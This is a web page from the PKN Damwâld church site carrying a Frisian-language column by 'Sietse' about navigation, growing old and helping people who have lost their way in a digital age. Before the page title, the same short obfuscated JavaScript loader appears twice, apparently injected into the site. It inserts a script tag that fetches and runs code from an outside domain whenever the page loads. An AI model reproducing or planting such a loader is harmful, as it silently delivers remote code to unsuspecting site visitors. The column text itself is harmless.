;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Navigatie - PKN Damwâld

Navigatie

Gepubliceerd op: dinsdag 15 november 2022

As jo âlder wurde komt de fergelyking mei âlde auto’s wolris foarby; salang as it yn gebrûk is, is der neat oan’e hân, mar te lang stilstean is fúnest. Stiif en stram om wêr op gong te kommen is de measten wol bekend,  by in âld auto kréktsa!  Boppedat mat jo it mei âlde auto’s sûnder de nij’ste techniek dwaan;  gjin airco, navigatie of airbag’s…!    Mar dochs kom jo fan A nei B, wat úteinlik it doel is.   Sûnder de help fan in navigatiesysteem wurd it lykwols sa stadichoan al in poepetoer om bygelyks in stéd as Utrecht troch te kommen, lit stean as it in stéd yn it bûtenlân is.

Om hjoeddedei troch de tiid te kommen is foar in soad minsken ek in poepetoer as it jild net al te rûm foar hannen is, mar, om by it navigeren te bliuwen, hoefolle minsken bin der wol net dy’t  it spoar bjuster reitsje yn dizze tiid fan digitalisering? En dan, wa helpt ús dan, foaral as we der allinne foarsteane en we ha ek nog de (libben’s-)wyn tsjin?  As wy te fietsen bin yn it bûtenlân komt it gauris foar dat we it paad bjuster bin, mar oan’t no ta bin we altiid wêr te plak kaam.  Hoe?? Dan komt it der op oan dat oare minsken jo letterlyk wêr op it goede spoar bringe; hjir links, dér rjocht’s, sels sûnder navigatie !

Dérom , kom jo minsken tsjin dy’t it spoar bjuster bin, digitaal of letterlik, help se wêr op wei, bygelyks troch se yn’e kunde te bringen mei it Trefpunt of de bibliotheek; op beide plakken is neist gesellichheid ek de kennis en kunde om minsken wêr op wei te helpen!

Columnist:Sietse

Leer mij kennen
Uitgelezen?

Gelukkig hebben wij meer columns!

Bekijk al onze columns